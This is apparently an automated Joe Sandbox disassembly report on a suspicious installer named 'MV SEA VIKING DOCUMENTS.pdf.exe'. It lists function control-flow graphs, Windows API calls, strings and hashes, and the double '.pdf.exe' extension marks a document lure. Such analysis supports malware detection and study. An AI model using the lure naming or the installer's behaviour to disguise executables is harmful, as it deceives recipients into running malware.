                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                • Opcode ID: 188c4e9886e387249e5b1775f5302049ca11197d765e1bca873797d01bc7712b
                                                                                                                                                                                                                                • Instruction ID: 9a872ed80fe7e08ef5e3d57c893076ff24209e067a1032a0b8b80b596156fee4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 188c4e9886e387249e5b1775f5302049ca11197d765e1bca873797d01bc7712b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0017C30205245CFDB698E648A8C3F933A2AF99344F18422BCC0FDB714D73099C6CA03
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 200 403fc9-403fd6 SetWindowPos 197->200 201 403fdc-403fe3 197->201 203 4041c6-4041cb call 4044e5 198->203 204 404188-40418b 198->204 199->198 200->201 206 403fe5-403fff ShowWindow 201->206 207 404027-40402d 201->207 212 4041d0-4041eb 203->212 209 40418d-404198 call 401389 204->209 210 4041be-4041c0 204->210 213 404100-40410e call 404500 206->213 214 404005-404018 GetWindowLongW 206->214 215 404046-404049 207->215 216 40402f-404041 DestroyWindow 207->216 209->210 229 40419a-4041b9 SendMessageW 209->229 210->203 211 404466 210->211 224 404468-40446f 211->224 221 4041f4-4041fa 212->221 222 4041ed-4041ef call 40140b 212->222 213->224 214->213 223 40401e-404021 ShowWindow 214->223 227 40404b-404057 SetWindowLongW 215->227 228 40405c-404062 215->228 225 404443-404449 216->225 233 404200-40420b 221->233 234 404424-40443d DestroyWindow EndDialog 221->234 222->221 223->207 225->211 232 40444b-404451 225->232 227->224 228->213 235 404068-404077 GetDlgItem 228->235 229->224 232->211 236 404453-40445c ShowWindow 232->236 233->234 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 233->237 234->225 238 404096-404099 235->238 239 404079-404090 SendMessageW IsWindowEnabled 235->239 236->211 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 240 40409b-40409c 238->240 241 40409e-4040a1 238->241 239->211 239->238 243 4040cc-4040d1 call 404472 240->243 244 4040a3-4040a9 241->244 245 4040af-4040b4 241->245 243->213 247 4040ea-4040fa SendMessageW 244->247 248 4040ab-4040ad 244->248 245->247 249 4040b6-4040bc 245->249 247->213 248->243 252 4040d3-4040dc call 40140b 249->252 253 4040be-4040c4 call 40140b 249->253 252->213 262 4040de-4040e8 252->262 264 4040ca 253->264 262->264 264->243 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->212 286 404339-40433b 275->286 286->212 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->225 291 40437e-4043ab CreateDialogParamW 288->291 289->211 290 404353-404359 289->290 290->212 292 40435f 290->292 291->225 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->225
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 121052019-0
                                                                                                                                                                                                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 322 403cac-403cd4 call 40640b 319->322 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 322->320 328 403cd6-403cda 322->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 344 403df3-403df6 330->344 345 403dfb-403e06 call 403ec2 330->345 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 360 403e32-403e44 GetClassInfoW 354->360 361 403e28-403e2d call 40689a 354->361 359 403e95-403e97 355->359 362 403eb1-403eb3 call 40140b 359->362 363 403e99-403e9f 359->363 366 403e46-403e56 GetClassInfoW RegisterClassW 360->366 367 403e5c-403e7f DialogBoxParamW call 40140b 360->367 361->360 362->335 363->344 368 403ea5-403eac call 40140b 363->368 366->367 372 403e84-403e8d call 403b3c 367->372 368->344 372->338
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F73420), ref: 00403CED
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                • API String ID: 1975747703-1862882193
                                                                                                                                                                                                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fe8 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069f7 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 434 40328b-4032a6 SetFilePointer call 405fe8 431->434 432->412 433 403174-40317b 432->433 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                                                                • API String ID: 2803837635-3988323475
                                                                                                                                                                                                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 521 4034c8-4034cc 518->521 524 4034aa-4034ad 519->524 525 40346c-40346f 519->525 522 4034c5 520->522 523 403367-40336f 520->523 522->521 527 403371 523->527 528 403374-403382 call 4034cf 523->528 529 4034b2-4034bb call 4034cf 524->529 530 4034af 524->530 525->522 526 403471 525->526 531 403474-40347a 526->531 527->528 528->516 540 403388-403391 528->540 529->516 538 4034c2 529->538 530->529 534 40347c 531->534 535 40347e-40348c call 4034cf 531->535 534->535 535->516 543 40348e-40349a call 4060df 535->543 538->522 542 403397-4033b7 call 406a65 540->542 548 403460-403462 542->548 549 4033bd-4033d0 GetTickCount 542->549 550 403464-403466 543->550 551 40349c-4034a6 543->551 548->518 552 4033d2-4033da 549->552 553 40341b-40341d 549->553 550->518 551->531 556 4034a8 551->556 557 4033e2-403413 MulDiv wsprintfW call 40559f 552->557 558 4033dc-4033e0 552->558 554 403454-403458 553->554 555 40341f-403423 553->555 554->523 561 40345e 554->561 559 403425-40342c call 4060df 555->559 560 40343a-403445 555->560 556->522 563 403418 557->563 558->553 558->557 566 403431-403433 559->566 565 403448-40344c 560->565 561->522 563->553 565->542 567 403452 565->567 566->550 568 403435-403438 566->568 567->522 568->565
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                                                                                                                                • API String ID: 551687249-3683892814
                                                                                                                                                                                                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 581 4017b5-4017b6 call 4067c4 574->581 575->581 584 4017bb-4017bf 581->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 593 4017dd-4017ef 585->593 594 4017cd-4017db CompareFileTime 585->594 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 593->586 594->593 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 598->584 633 401864-401865 598->633 609 401882-401888 599->609 613 402c33 609->613 611->612 615 4018d0-4018db CloseHandle 611->615 612->615 616 402c35-402c39 613->616 618 4018e1-4018e4 615->618 619 402c2a-402c2d 615->619 621 4018e6-4018f7 call 40657a lstrcatW 618->621 622 4018f9-4018fc call 40657a 618->622 619->613 626 401901-402398 621->626 622->626 631 40239d-4023a2 626->631 632 402398 call 405b9d 626->632 631->616 632->631 633->609 634 401867-401868 633->634 634->599
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                Strings
